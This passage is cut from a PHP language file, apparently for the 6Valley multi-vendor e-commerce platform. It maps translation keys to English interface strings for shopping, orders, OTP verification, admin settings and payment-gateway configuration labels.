'Wishlist' => 'Wishlist', 'In_Compare' => 'In Compare', 'My_Order' => 'My Order', 'My_Wishlist' => 'My Wishlist', 'My_Compare_list' => 'My Compare list', 'Support' => 'Support', 'Close_Ticket' => 'Close Ticket', 'Messages' => 'Messages', 'Search...' => 'Search...', 'Delivery_Man' => 'Delivery Man', 'All_Order_List' => 'All Order List', 'Remove_All' => 'Remove All', 'Unit Price' => 'Unit Price', 'Check_Status' => 'Check Status', 'My_Order_Details' => 'My Order Details', 'OnGoing' => 'OnGoing', 'Go Back' => 'Go Back', 'Zip Code' => 'Zip Code', 'Category_tag' => 'Category tag', 'Recommended' => 'Recommended', 'Positive' => 'Positive', 'Neutral' => 'Neutral', 'Negative' => 'Negative', 'View_More' => 'View More', 'View_Less' => 'View Less', 'Product_review_not_available' => 'Product review not available', 'Shop_Page' => 'Shop Page', 'Similar_Category_Product' => 'Similar Category Product', 'no_more_review_remain_to_load' => 'No more review remain to load', 'Search_Products' => 'Search Products', 'User_Not_Exist' => 'User Not Exist', 'See_Less' => 'See Less', 'TAX Exclude Product TAX Exclude Product TAX Exclude Product TAX Exclude Product' => 'TAX Exclude Product TAX Exclude Product TAX Exclude Product TAX Exclude Product', 'Delivery' => 'Delivery', 'most favorite' => 'Most favorite', 'product 1' => 'Product 1', 'seller test digital product 2' => 'Seller test digital product 2', 'product 2' => 'Product 2', 'Test Product' => 'Test Product', 'Proddduct 2' => 'Proddduct 2', 'All_Brand' => 'All Brand', 'Newsletter' => 'Newsletter', 'Be_the_first_one_to_know_about_discounts' => 'Be the first one to know about discounts', ' offers_and_events' => ' offers and events', 'Enter_your_email' => 'Enter your email', 'Payment_Option' => 'Payment Option', 'Price_Range' => 'Price Range', 'By_Review_Rating' => 'By Review Rating', 'Enjoy_New_experience' => 'Enjoy New experience', 'my product' => 'My product', 'Featured' => 'Featured', 'Most_Loved' => 'Most Loved', 'Password doesn t Match' => 'Password doesn t Match', 'Login_Now' => 'Login Now', 'Please_type_verify_code' => 'Please type verify code', 'Your_password_must_be_at_least_8_characters' => 'Your password must be at least 8 characters', 'Password_doesn t_Match' => 'Password doesn t Match', 'Track_Order_Result ' => 'Track Order Result ', 'Your_order' => 'Your order', 'is' => 'Is', 'Order_Created_At' => 'Order Created At', 'Olga Sheppard' => 'Olga Sheppard', 'My_Address' => 'My Address', 'My_Wishlists' => 'My Wishlists', 'My_Loyalty_Point' => 'My Loyalty Point', 'Minimum' => 'Minimum', 'points_required_to_convert' => 'Points required to convert', 'Minimum_200_Points_required_to_convert_Into_currency' => 'Minimum 200 Points required to convert Into currency', 'Close_this_ticket' => 'Close this ticket', 'start_typing' => 'Start typing', 'new shop digital product' => 'New shop digital product', 'credentials_do_not_match_or_account_has_been_suspended' => 'Credentials do not match or account has been suspended', 'Store_Secondary_Banner' => 'Store Secondary Banner', 'upload_theme' => 'Upload theme', 'select_theme' => 'Select theme', 'updated successfully!' => 'Updated successfully!', 'home_category_status' => 'Home category status', 'Top Side Banner' => 'Top Side Banner', 'Codecanyon' => 'Codecanyon', 'usename' => 'Usename', 'Ex:_Riad_Uddin' => 'Ex: Riad Uddin', 'Purchase' => 'Purchase', 'Ex: 987652' => 'Ex: 987652', 'Activate' => 'Activate', 'theme_mode' => 'Theme mode', 'Forget Password' => 'Forget Password', 'please_enter_your_email_to_send_a_verification_code_for_forget_password' => 'Please enter your email to send a verification code for forget password', 'Back_Again' => 'Back Again', 'Saved_Addresses' => 'Saved Addresses', 'Saved Addresses' => 'Saved Addresses', 'address_added_successfully!' => 'Address added successfully!', 'All_Pages_Banner' => 'All Pages Banner', 'OTP_and_login_setup' => 'OTP and login setup', 'OTP_verification' => 'OTP verification', 'order_verification' => 'Order verification', 'account_phone_not_verified' => 'Account phone not verified', 'Customer_Verify' => 'Customer Verify', 'OTP_Verification' => 'OTP Verification', 'Please_Verify_that_it’s_you' => 'Please Verify that it’s you', 'An_OTP_(One_Time_Password)_has_been_sent_to' => 'An OTP (One Time Password) has been sent to', 'Please_enter_the_OTP_in_the_field_below_to_verify_your_phone' => 'Please enter the OTP in the field below to verify your phone', 'Resend_code_within' => 'Resend code within', 'Resend_OTP' => 'Resend OTP', 'Verification_Successfully_Completed' => 'Verification Successfully Completed', 'Thank_you_for_your_verification' => 'Thank you for your verification', 'Now_you_can_login' => 'Now you can login', 'your_account_is_ready_to_use' => 'Your account is ready to use', 'OTP_has_been_sent_again.' => 'OTP has been sent again.', 'please_wait_for_new_code.' => 'Please wait for new code.', 'Verification code/ OTP mismatched' => 'Verification code/ OTP mismatched', 'OTP_setup' => 'OTP setup', 'maximum OTP hit' => 'Maximum OTP hit', 'The maximum OTP hit is a measure of how many times a specific one-time password has been generated and used within a time.' => 'The maximum OTP hit is a measure of how many times a specific one-time password has been generated and used within a time.', 'OTP resend time' => 'OTP resend time', 'in_minute' => 'In minute', 'temporary_block_time' => 'Temporary block time', 'maximum Login hit' => 'Maximum Login hit', 'The maximum login hit is a measure of how many times a user can submit password within a time.' => 'The maximum login hit is a measure of how many times a user can submit password within a time.', 'temporary_login_block_time' => 'Temporary login block time', 'Settings updated!' => 'Settings updated!', 'please_try_again_after_' => 'Please try again after ', 'otp_not_found' => 'Otp not found', 'do_you_want_to_shift_in_another_theme' => 'Do you want to shift in another theme', 'if_you_shift_in_another_theme' => 'If you shift in another theme', 'everything_will_be_rearranged' => 'Everything will be rearranged', 'according_to_theme' => 'According to theme', 'too_many_attempts. please_try_again_after_' => 'Too many attempts. please try again after ', 'are_you_sure_you_want_to_delete_the_theme' => 'Are you sure you want to delete the theme', 'once_you_delete' => 'Once you delete', 'you_will_lost_the_this_theme' => 'You will lost the this theme', 'Shop_wise_with' => 'Shop wise with', 'price_comparisons' => 'Price comparisons', 'Explore_Now' => 'Explore Now', 'Most_Visited_Categories' => 'Most Visited Categories', 'Most_Searching' => 'Most Searching', 'Others_Store' => 'Others Store', 'Popular_Tags' => 'Popular Tags', 'Upcoming_Campaign' => 'Upcoming Campaign', 'All_Brands' => 'All Brands', 'All_products' => 'All products', 'Blog' => 'Blog', 'About_us' => 'About us', 'Manage_Deliveries' => 'Manage Deliveries', 'Payments' => 'Payments', 'FAQs' => 'FAQs', 'sell_on' => 'Sell on', 'Check_now' => 'Check now', 'Exclusive & Fashionable Suit For Men' => 'Exclusive & Fashionable Suit For Men', 'How_the_Setting_Works' => 'How the Setting Works', 'get_your_zip_file_from_the_purchased_theme_and_upload_it_and_activate_theme_with_your_Codecanyon_username_and_purchase_code' => 'Get your zip file from the purchased theme and upload it and activate theme with your Codecanyon username and purchase code', 'now_you’ll_be_successfully_able_to_use_the_theme_for_your_6Valley_website' => 'Now you’ll be successfully able to use the theme for your 6Valley website', 'N:B you_can_upload_only_6Valley’s_theme_templates' => 'N:B you can upload only 6Valley’s theme templates', 'Got_It' => 'Got It', 'Cookie_Settings' => 'Cookie Settings', 'OTP_and_Login_Setup' => 'OTP and Login Setup', 'login_successful' => 'Login successful', 'theme_delete_successfully' => 'Theme delete successfully', 'Artificial Leather Shoes for Men by Mosharrof Shoes' => 'Artificial Leather Shoes for Men by Mosharrof Shoes', 'please_make_sure' => 'Please make sure', 'value_is_grater _or_equal_to_180M' => 'Value is grater or equal to 180M', 'current_value_is' => 'Current value is', 'your_server_php' => 'Your server php', 'value_is_grater_or_equal_to_200M' => 'Value is grater or equal to 200M', 'theme_upload_successfully!' => 'Theme upload successfully!', 'activated_successfully' => 'Activated successfully', 'activation failed' => 'Activation failed', 'Update_this_Address' => 'Update this Address', 'Invalid Order Id or Phone Number' => 'Invalid Order Id or Phone Number', 'Delivery_unavailable_in_this_country' => 'Delivery unavailable in this country', 'Order_Placed' => 'Order Placed', 'Order_Received_Notify_Seller' => 'Order Received Notify Seller', 'if_you_need_help' => 'If you need help', 'or_you_have_any_other_questions' => 'Or you have any other questions', 'feel_free_to_email_us' => 'Feel free to email us', 'Kids Wood Table and 4 Chair Set Natural Table Assorted Color Chairs' => 'Kids Wood Table and 4 Chair Set Natural Table Assorted Color Chairs', 'No_Product_Found' => 'No Product Found', 'no_conversation_found' => 'No conversation found', 'product compares' => 'Product compares', 'Enter_url' => 'Enter url', 'Add_Product' => 'Add Product', 'want_to_delete_this_item' => 'Want to delete this item', 'remove' => 'Remove', 'Cooking Recipe Book' => 'Cooking Recipe Book', 'Comic book pdf' => 'Comic book pdf', 'no_data_found' => 'No data found', 'generate_barcode' => 'Generate barcode', 'maximum_quantity_270' => 'Maximum quantity 270', 'print' => 'Print', 'This page is for A4 size page printer so it won t be visible in smaller devices' => 'This page is for A4 size page printer so it won t be visible in smaller devices', 'Background Music for commercial use' => 'Background Music for commercial use', 'system_setup' => 'System setup', 'Ladies Winter Long Sleeve Sweater' => 'Ladies Winter Long Sleeve Sweater', 'If the user fails to get the OTP within a certain time user can request a resend' => 'If the user fails to get the OTP within a certain time user can request a resend', 'Temporary OTP block time refers to a security measure implemented by systems to restrict access to OTP service for a specified period of time for wrong OTP submission.' => 'Temporary OTP block time refers to a security measure implemented by systems to restrict access to OTP service for a specified period of time for wrong OTP submission.', 'Temporary login block time refers to a security measure implemented by systems to restrict access for a specified period of time for wrong Password submission' => 'Temporary login block time refers to a security measure implemented by systems to restrict access for a specified period of time for wrong Password submission', 'account_email_not_verified' => 'Account email not verified', 'An_OTP_(One_Time_Password)_has_been_sent_to_your_email' => 'An OTP (One Time Password) has been sent to your email', 'Please_enter_the_OTP_in_the_field_below_to_verify_your_email' => 'Please enter the OTP in the field below to verify your email', 'Email_Verification' => 'Email Verification', 'in_seconds' => 'In seconds', 'instructions' => 'Instructions', 'Employee_Update' => 'Employee Update', 'Select All' => 'Select All', 'Promotion_Management' => 'Promotion Management', 'Reports_&_Analytics' => 'Reports & Analytics', 'User_Management' => 'User Management', 'Employee Roles' => 'Employee Roles', 'search_role' => 'Search role', 'product management' => 'Product management', 'marketing section' => 'Marketing section', 'business section' => 'Business section', 'promotion management' => 'Promotion management', 'Are_you_sure_delete_this_role' => 'Are you sure delete this role', 'Role_deleted_successfully' => 'Role deleted successfully', 'Role_Update' => 'Role Update', 'Select_All' => 'Select All', 'reports_and_analytics' => 'Reports and analytics', 'Add_New_Employee' => 'Add New Employee', 'Full Name' => 'Full Name', 'Confirm Password' => 'Confirm Password', 'pos management' => 'Pos management', 'invalid_theme!' => 'Invalid theme!', 'All_Pages_Banner ' => 'All Pages Banner ', 'Product_List_Page' => 'Product List Page', 'Terms_and_Conditions' => 'Terms and Conditions', 'Banner Terms Conditions' => 'Banner Terms Conditions', 'Banner Cancellation Policy' => 'Banner Cancellation Policy', 'features_Section' => 'Features Section', 'type_your_title_text' => 'Type your title text', 'sub_Title' => 'Sub Title', 'type_your_subtitle_text' => 'Type your subtitle text', 'middle' => 'Middle', 'add_New' => 'Add New', 'bottom' => 'Bottom', 'icon_box' => 'Icon box', 'upload_Icon' => 'Upload Icon', 'value_is_grater _or_equal_to_20M' => 'Value is grater or equal to 20M', 'value_is_grater_or_equal_to_20M' => 'Value is grater or equal to 20M', 'value_is_grater _or_equal_to_20MB' => 'Value is grater or equal to 20MB', 'value_is_grater_or_equal_to_20MB' => 'Value is grater or equal to 20MB', 'your_address' => 'Your address', 'Sneakers man new design fabrics shoes with high lace up design and rubber materi' => 'Sneakers man new design fabrics shoes with high lace up design and rubber materi', 'Kevin Barr' => 'Kevin Barr', 'digital product' => 'Digital product', 'test product 1' => 'Test product 1', 'test product 2' => 'Test product 2', 'Website_Color' => 'Website Color', 'Application System' => 'Application System', 'First_Shipping' => 'First Shipping', 'First_Shipping_all_accross_the_country' => 'First Shipping all accross the country', 'Authentic_Product' => 'Authentic Product', '100%_Authentic_Products' => '100% Authentic Products', 'First_Shipping_all_across_the_country' => 'First Shipping all across the country', 'Authentic_Products' => 'Authentic Products', 'We_Ensure_Quality_Support' => 'We Ensure Quality Support', 'featured_product' => 'Featured product', 'featured_product_for_this_season' => 'Featured product for this season', 'find_your_best_featured_product' => 'Find your best featured product', 'most_demanded' => 'Most demanded', 'most_demanded_product' => 'Most demanded product', 'product_of_this_year' => 'Product of this year', 'delivery' => 'Delivery', 'wishes' => 'Wishes', 'Refer_Code' => 'Refer Code', 'use_referral_code' => 'Use referral code', 'read_more' => 'Read more', 'all_your_data_are_safe' => 'All your data are safe', 'we_are_using_the_most_advanced_security_to_provide_you_the_best_experience_ever.' => 'We are using the most advanced security to provide you the best experience ever.', 'hotline' => 'Hotline', 'ticket' => 'Ticket', 'contact_with_support_team' => 'Contact with support team', 'accounts' => 'Accounts', 'earnings' => 'Earnings', 'Refer_&_Earn' => 'Refer & Earn', 'Earn_as_Delivery_Man' => 'Earn as Delivery Man', 'Accept_All_Cookies' => 'Accept All Cookies', 'About_Our_Company' => 'About Our Company', 'All_Cart_Product_List' => 'All Cart Product List', 'want_to_clear_all_cart ' => 'Want to clear all cart ', 'Size' => 'Size', 'Totals_Cost' => 'Totals Cost', 'Apply_Coupon_Code' => 'Apply Coupon Code', 'Proceed_To_Checkout' => 'Proceed To Checkout', 'Button_Text' => 'Button Text', 'Enter_button_text' => 'Enter button text', 'Enter_banner_title' => 'Enter banner title', 'Sub_Title' => 'Sub Title', 'Enter_banner_sub_title' => 'Enter banner sub title', 'search_By_Order_Id' => 'Search By Order Id', 'search_by_Name_or_Category' => 'Search by Name or Category', 'All_Wishing_Product_List' => 'All Wishing Product List', 'Stock_Status' => 'Stock Status', 'Stock_not_available' => 'Stock not available', 'Add_to_cart' => 'Add to cart', 'Stock_Available' => 'Stock Available', 'No_Discount' => 'No Discount', 'Stock_Not_Available' => 'Stock Not Available', 'Classic Sneakers For Men' => 'Classic Sneakers For Men', 'Total_Price_For_This_Product' => 'Total Price For This Product', 'You_can_check_our' => 'You can check our', 'Ask_about_this_product' => 'Ask about this product', 'Top_Rated_Product_from_This_Store' => 'Top Rated Product from This Store', 'Similar_Product_from_This_Store' => 'Similar Product from This Store', 'You_May_Also_Like' => 'You May Also Like', 'product 50%' => 'Product 50%', 'New Digital Product' => 'New Digital Product', 'featured_Product_From_This_Store' => 'Featured Product From This Store', 'see_all' => 'See all', 'All_Product' => 'All Product', 'My_Order_Details_Delivery_Man_Info' => 'My Order Details Delivery Man Info', 'Chat_with_Delivery_man' => 'Chat with Delivery man', 'My_Order_Details_Seller_Info' => 'My Order Details Seller Info', 'Ladies Bag' => 'Ladies Bag', 'Product_Comparison' => 'Product Comparison', 'Find_and_select_products_to_see_the_differences_and_similarities_between_them' => 'Find and select products to see the differences and similarities between them', 'Color_Variant' => 'Color Variant', 'Search_by_Name_or_Category' => 'Search by Name or Category', 'want_to_remove_compare_list_product ' => 'Want to remove compare list product ', '_Color_Available' => ' Color Available', 'no_' => 'No ', 'no_Rating' => 'No Rating', 'no_Color' => 'No Color', 'Store_List' => 'Store List', 'Search_Store' => 'Search Store', 'Static Stock Limit' => 'Static Stock Limit', 'Edit_My_Profile' => 'Edit My Profile', 'Go_Back' => 'Go Back', 'Ex:_Jhone' => 'Ex: Jhone', 'Ex:_Doe' => 'Ex: Doe', 'Enter_email_number' => 'Enter email number', 'Image_Ration_1:1' => 'Image Ration 1:1', 'NB:_Image_size_must_be_within_2_MB' => 'NB: Image size must be within 2 MB', 'Image_format_-_jpg _jpeg _png' => 'Image format - jpg jpeg png', 'Please_ReType_Password' => 'Please ReType Password', 'Passwords_do_not_match' => 'Passwords do not match', 'password_Must_Be_6_Character' => 'Password Must Be 6 Character', 'Passwords_match' => 'Passwords match', 'Physical Product' => 'Physical Product', 'Share' => 'Share', 'women s shoes' => 'Women s shoes', 'update_product' => 'Update product', '3USB Head Phone' => '3USB Head Phone', 'Running Shoes' => 'Running Shoes', 'search_by_brands' => 'Search by brands', 'Payment_History' => 'Payment History', 'Loyalty Point' => 'Loyalty Point', 'Add_New_Card' => 'Add New Card', 'Item_has_been_removed_from_cart ' => 'Item has been removed from cart ', 'Start_From' => 'Start From', 'Hot Selling Sneakers Sneakers Men Casual Shoes Men Fashion Sneakers Fly knit Li' => 'Hot Selling Sneakers Sneakers Men Casual Shoes Men Fashion Sneakers Fly knit Li', 'checkout_details' => 'Checkout details', 'Set_from_map' => 'Set from map', 'Set_Delivery_Address' => 'Set Delivery Address', 'Proceed_To_Next' => 'Proceed To Next', 'Fill_all_required_fields_of_shipping_address' => 'Fill all required fields of shipping address', 'Select_Payment_Method' => 'Select Payment Method', 'Cash_On_Delivery' => 'Cash On Delivery', 'Please_contact_with_deliveryman_to_confirm_your_pay_and_receive_your_order.' => 'Please contact with deliveryman to confirm your pay and receive your order.', 'Please_confirm_your_verified_account_to_pay_through_your_bank_account' => 'Please confirm your verified account to pay through your bank account', 'Pay_with_secure_Digital_payment_gateways' => 'Pay with secure Digital payment gateways', 'order_complete' => 'Order complete', 'Thank_you_for_your_order!_Your_order_is_being_processed_and_will_be_completed_within_3-6 hours._You_will_receive_an_email_confirmation_when_your_order_is_completed.' => 'Thank you for your order! Your order is being processed and will be completed within 3-6 hours. You will receive an email confirmation when your order is completed.', 'My_Order_Details_Track_Order' => 'My Order Details Track Order', 'Order_delivered' => 'Order delivered', 'Enter_your_order_ID_& _phone_to_get_delivery_updates' => 'Enter your order ID & phone to get delivery updates', 'Track_Order_Result' => 'Track Order Result', 'add_Address' => 'Add Address', 'Ex:_01XXXXXX' => 'Ex: 01XXXXXX', 'Enter_Your_City' => 'Enter Your City', 'Enter_Your_zip_code' => 'Enter Your zip code', 'Women s long-sleeve lightweight french terry fleece quarter-zip top' => 'Women s long-sleeve lightweight french terry fleece quarter-zip top', 'Earn_money _o_your_wallet_by_completingthe_offer_&_challenged' => 'Earn money o your wallet by completingthe offer & challenged', 'Total_Point' => 'Total Point', 'Minimum_' => 'Minimum ', '_points_required_to_convert_into_currency' => ' points required to convert into currency', 'Convert_to_Currency' => 'Convert to Currency', 'Point_Transaction_History' => 'Point Transaction History', 'Support_Ticket_Inbox' => 'Support Ticket Inbox', 'start_typing...' => 'Start typing...', 'brand_List' => 'Brand List', 'search_Brands' => 'Search Brands', 'clear' => 'Clear', 'Flash Sale for Any Item' => 'Flash Sale for Any Item', 'Flash Deals' => 'Flash Deals', 'ecommerce' => 'Ecommerce', 'Address_Type' => 'Address Type', 'Become_a_Seller' => 'Become a Seller', 'offers' => 'Offers', 'featured_Deal' => 'Featured Deal', 'login_to_your_account.' => 'Login to your account.', 'login_to_your_seller_account.' => 'Login to your seller account.', 'no_thanks' => 'No thanks', 'yes_i_Accept' => 'Yes i Accept', 'page_Not_found' => 'Page Not found', 'we_are_sorry' => 'We are sorry', 'the_page_you_requested_could_not_be_found' => 'The page you requested could not be found', 'please_go_back_to_the_homepage' => 'Please go back to the homepage', 'Order_Complete' => 'Order Complete', 'your_order_is_being_processed_and_will_be_completed_within_3-6_hours.' => 'Your order is being processed and will be completed within 3-6 hours.', 'you_will_receive_an_email_confirmation_when_your_order_is_completed.' => 'You will receive an email confirmation when your order is completed.', 'My_profile' => 'My profile', 'Show_Order' => 'Show Order', 'Shipping_Fee' => 'Shipping Fee', 'Discount_on_product' => 'Discount on product', 'Sorry_Out_of_stock' => 'Sorry Out of stock', 'Type_your_message' => 'Type your message', 'Choose_Option' => 'Choose Option', 'Online_Shopping' => 'Online Shopping', 'Just_reorder_from_your_previous_orders.' => 'Just reorder from your previous orders.', 'Do_not_Miss_Todays_Deal' => 'Do not Miss Todays Deal', 'Let_us_Shopping_Today' => 'Let us Shopping Today', 'welcome_message' => 'Welcome message', 'overall_statistics' => 'Overall statistics', 'todays_Statistics' => 'Todays Statistics', 'this_Months_Statistics' => 'This Months Statistics', 'total_Sale' => 'Total Sale', 'total_Stores' => 'Total Stores', 'total_Products' => 'Total Products', 'total_Customers' => 'Total Customers', 'failed_to_delivery' => 'Failed to delivery', 'this_Year' => 'This Year', 'this_Month' => 'This Month', 'this_Week' => 'This Week', 'in-house' => 'In-house', 'most_Popular_Stores' => 'Most Popular Stores', 'top_Delivery_Man' => 'Top Delivery Man', 'do_you_want_to_logout' => 'Do you want to logout', 'failed_to_Deliver' => 'Failed to Deliver', 'refund_Requests' => 'Refund Requests', 'category_Setup' => 'Category Setup', 'sub_Categories' => 'Sub Categories', 'sub_Sub_Categories' => 'Sub Sub Categories', 'product_Attributes' => 'Product Attributes', 'in-Hous_Products' => 'In-Hous Products', 'in-house_Products' => 'In-house Products', 'seller_Products' => 'Seller Products', 'new_Products' => 'New Products', 'approved_Products' => 'Approved Products', 'denied_Products' => 'Denied Products', 'offers_&_Deals' => 'Offers & Deals', 'flash_Deals' => 'Flash Deals', 'push_Notification' => 'Push Notification', 'support_Ticket' => 'Support Ticket', 'reports_&_Analysis' => 'Reports & Analysis', 'sales_&_Transaction_Report' => 'Sales & Transaction Report', 'inhouse_Sales' => 'Inhouse Sales', 'seller_Sales' => 'Seller Sales', 'transaction_Report' => 'Transaction Report', 'product_Report' => 'Product Report', 'order_Report' => 'Order Report', 'customer_List' => 'Customer List', 'customer_Reviews' => 'Customer Reviews', 'loyalty_Points' => 'Loyalty Points', 'add_New_Seller' => 'Add New Seller', 'seller_List' => 'Seller List', 'withdrawal_Methods' => 'Withdrawal Methods', 'employee_Role_Setup' => 'Employee Role Setup', 'system_Settings' => 'System Settings', 'business_Setup' => 'Business Setup', 'social_Media_Links' => 'Social Media Links', 'system_Setup' => 'System Setup', 'software_version' => 'Software version', 'ready_to_Leave' => 'Ready to Leave', 'Select_Logout_below_if_you_are_ready_to_end_your_current_session' => 'Select Logout below if you are ready to end your current session', 'you_have_new_order' => 'You have new order', 'check_please' => 'Check please', 'let_me_check' => 'Let me check', 'are_you_sure' => 'Are you sure', 'update_option_is_disabled_for_demo' => 'Update option is disabled for demo', 'order_List' => 'Order List', 'select_Date_Range' => 'Select Date Range', 'in_House' => 'In House', 'start_Date' => 'Start Date', 'end_Date' => 'End Date', 'show_data' => 'Show data', 'failed_To_Delivery' => 'Failed To Delivery', 'search_by_Order_ID' => 'Search by Order ID', 'order_Date' => 'Order Date', 'total_Amount' => 'Total Amount', 'order_Status' => 'Order Status', 'invalid_date_range' => 'Invalid date range', 'coupon_Add' => 'Coupon Add', 'select_coupon_type' => 'Select coupon type', 'discount_on_Purchase' => 'Discount on Purchase', 'free_Delivery' => 'Free Delivery', 'first_Order' => 'First Order', 'ex' => 'Ex', 'select_coupon_bearer' => 'Select coupon bearer', 'limit_for_same_user' => 'Limit for same user', 'discount_Amount' => 'Discount Amount', 'search_by_Title_or_Code_or_Discount_Type' => 'Search by Title or Code or Discount Type', 'used' => 'Used', 'Coupon_added_successfully' => 'Coupon added successfully', 'coupon_Edit' => 'Coupon Edit', 'select_Coupon_Type' => 'Select Coupon Type', 'order_Details' => 'Order Details', 'print_Invoice' => 'Print Invoice', 'payment_Method' => 'Payment Method', 'payment_Status' => 'Payment Status', 'item Details' => 'Item Details', 'variations' => 'Variations', 'order_&_Shipping_Info' => 'Order & Shipping Info', 'shipping_Method' => 'Shipping Method', 'Company Vehicle' => 'Company Vehicle', 'customer_information' => 'Customer information', 'contact' => 'Contact', 'shop_Information' => 'Shop Information', 'orders_Served' => 'Orders Served', 'location_Data' => 'Location Data', 'you_will_not_be_able_to_revert_this' => 'You will not be able to revert this', 'yes_change_it' => 'Yes change it', 'account_has_been_deleted_you_can_not_change_the_status' => 'Account has been deleted you can not change the status', 'status_change_successfully' => 'Status change successfully', 'order_is_already_delivered_you_can_not_change_it' => 'Order is already delivered you can not change it', 'before_delivered_you_need_to_make_payment_status_paid' => 'Before delivered you need to make payment status paid', 'delivery_man_successfully_assigned_or_changed' => 'Delivery man successfully assigned or changed', 'deliveryman_man_can_not_assign_or_change_in_that_status' => 'Deliveryman man can not assign or change in that status', 'add_valid_data' => 'Add valid data', 'only_available_when_order_is_out_for_delivery' => 'Only available when order is out for delivery', 'deliveryman_charge_add_successfully' => 'Deliveryman charge add successfully', 'failed_to_add_deliveryman_charge' => 'Failed to add deliveryman charge', 'this_shop_is_temporary_closed_or_on_vacation.' => 'This shop is temporary closed or on vacation.', 'You_cannot_add_product_to_cart_from_this_shop_for_now' => 'You cannot add product to cart from this shop for now', 'admin_or_Employee_Login' => 'Admin or Employee Login', '8+_characters_required' => '8+ characters required', 'please_check_the_recaptcha' => 'Please check the recaptcha', 'coupon_bearer_is_required' => 'Coupon bearer is required', 'select_seller_is_required' => 'Select seller is required', 'select_customer_is_required' => 'Select customer is required', 'limit_for_same_user_is_required' => 'Limit for same user is required', 'discount_type_is_required' => 'Discount type is required', 'discount_amount_is_required' => 'Discount amount is required', 'minimum_purchase_is_required' => 'Minimum purchase is required', 'Coupon_updated_successfully' => 'Coupon updated successfully', 'address_not_found' => 'Address not found', 'Delivery_unavailable_for_this_country' => 'Delivery unavailable for this country', 'app_Settings' => 'App Settings', 'in-House_Shop' => 'In-House Shop', 'delivery_Restriction' => 'Delivery Restriction', 'cookie_Settings' => 'Cookie Settings', 'by_turning_on_maintaince_mode _all_your_app_and_customer_side_website_will_be_off._Only_admin_panel_and_seller_panel_will_be_functional' => 'By turning on maintaince mode all your app and customer side website will be off. Only admin panel and seller panel will be functional', 'company_Information' => 'Company Information', 'company_Name' => 'Company Name', 'your_shop_address' => 'Your shop address', 'time_zone' => 'Time zone', 'currency_Position' => 'Currency Position', 'left' => 'Left', 'right' => 'Right', 'email_verification' => 'Email verification', 'pagination_settings' => 'Pagination settings', 'website_Color' => 'Website Color', 'primary_Color' => 'Primary Color', 'secondary_Color' => 'Secondary Color', 'primary_Light_Color' => 'Primary Light Color', 'website_Header_Logo' => 'Website Header Logo', 'choose_File' => 'Choose File', 'website_Footer_Logo' => 'Website Footer Logo', 'website_Favicon' => 'Website Favicon', 'loading_Gif' => 'Loading Gif', 'be_careful_before_you_turn_on/off_maintenance_mode' => 'Be careful before you turn on/off maintenance mode', 'both_Phone_&_Email_verification_can_not_be_active_at_a_time' => 'Both Phone & Email verification can not be active at a time', 'order_Settings' => 'Order Settings', 'show_Billing_Address_In_Checkout' => 'Show Billing Address In Checkout', 'please_make_sure_all_the product s_delivery_charges_are_up_to_date.' => 'Please make sure all the product s delivery charges are up to date.', '4_to_6_days' => '4 to 6 days', 'shipping_responsibility_updated_successfully' => 'Shipping responsibility updated successfully', 'shipping_method_updated_successfully' => 'Shipping method updated successfully', 'order_wise_shipping_method_Status_updated_successfully' => 'Order wise shipping method Status updated successfully', 'are_you_sure_delete_this' => 'Are you sure delete this', 'yes_delete_it' => 'Yes delete it', 'Order_Wise_Shipping_Method_deleted_successfully' => 'Order Wise Shipping Method deleted successfully', 'no_delivery_man_assigned_yet' => 'No delivery man assigned yet', 'SMS_Module_Setup' => 'SMS Module Setup', 'EX_of_SMS_providers_template_:_your_OTP_is_XXXX_here_please_check' => 'EX of SMS providers template : your OTP is XXXX here please check', 'NB_:_XXXX_will_be_replace_with_otp' => 'NB : XXXX will be replace with otp', 'NB_:_Keep_an_OTP_variable_in_your_SMS_providers_OTP_Template' => 'NB : Keep an OTP variable in your SMS providers OTP Template', 'auth_key' => 'Auth key', 'mail_Config' => 'Mail Config', 'test_your_email_integration' => 'Test your email integration', 'mail' => 'Mail', 'send_mail' => 'Send mail', 'host' => 'Host', 'driver' => 'Driver', 'encryption' => 'Encryption', 'a_test_mail_will_be_sent_to_your_email' => 'A test mail will be sent to your email', 'email_configuration_error' => 'Email configuration error', 'email_configured_perfectly' => 'Email configured perfectly', 'email_status_is_not_active' => 'Email status is not active', 'invalid_email_address' => 'Invalid email address', 'store_ID' => 'Store ID', 'store_password' => 'Store password', 'Paypal_Client_ID' => 'Paypal Client ID', 'paypal_Secret' => 'Paypal Secret', 'callback_URI' => 'Callback URI', 'copy_URI' => 'Copy URI', 'secret_key' => 'Secret key', 'merchant_ID' => 'Merchant ID', 'public_Key' => 'Public Key', 'secret_Key' => 'Secret Key', 'payment_Url' => 'Payment Url', 'merchant_Email' => 'Merchant Email', 'private_Key' => 'Private Key', 'Copied_to_the_clipboard' => 'Copied to the clipboard', 'reference_Code' => 'Reference Code', 'payment_Note' => 'Payment Note', 'main_Banner' => 'Main Banner', 'footer_Banner' => 'Footer Banner', 'popup_Banner' => 'Popup Banner', 'main_Section_Banner' => 'Main Section Banner', 'header_Banner' => 'Header Banner', 'sidebar_Banner' => 'Sidebar Banner', 'top_Side_Banner' => 'Top Side Banner', 'search_by_Banner_Type' => 'Search by Banner Type', 'banner_published_successfully' => 'Banner published successfully', 'banner_unpublished_successfully' => 'Banner unpublished successfully', 'are_you_sure_delete_this_banner' => 'Are you sure delete this banner', 'banner_deleted_successfully' => 'Banner deleted successfully', 'deal_Of_The_Day' => 'Deal Of The Day', 'select_Product' => 'Select Product', 'search_by_Title' => 'Search by Title', 'social_Login' => 'Social Login', 'store_Client_ID' => 'Store Client ID', 'store_Client_Secret_Key' => 'Store Client Secret Key', 'see_Credential_Setup_Instructions' => 'See Credential Setup Instructions', 'google_API_Set_up_Instructions' => 'Google API Set up Instructions', 'Go_to_the_Credentials_page' => 'Go to the Credentials page', 'create_credentials' => 'Create credentials', 'OAuth_client_ID' => 'OAuth client ID', 'select_the' => 'Select the', 'web_application' => 'Web application', 'ADD_URI' => 'ADD URI', 'authorized_redirect_URIs' => 'Authorized redirect URIs', 'provide_the' => 'Provide the', 'from_below_and_click' => 'From below and click', 'create' => 'Create', 'client_Secret' => 'Client Secret', 'paste_in_the_input_filed_below_and' => 'Paste in the input filed below and', 'facebook_API_Set_up_Instructions' => 'Facebook API Set up Instructions', 'go_to_the_facebook_developer_page' => 'Go to the facebook developer page', 'get_started' => 'Get started', 'from_Navbar' => 'From Navbar', 'from_Register_tab_press' => 'From Register tab press', 'continue' => 'Continue', 'if_needed' => 'If needed', 'provide_Primary_Email_and_press' => 'Provide Primary Email and press', 'confirm_Email' => 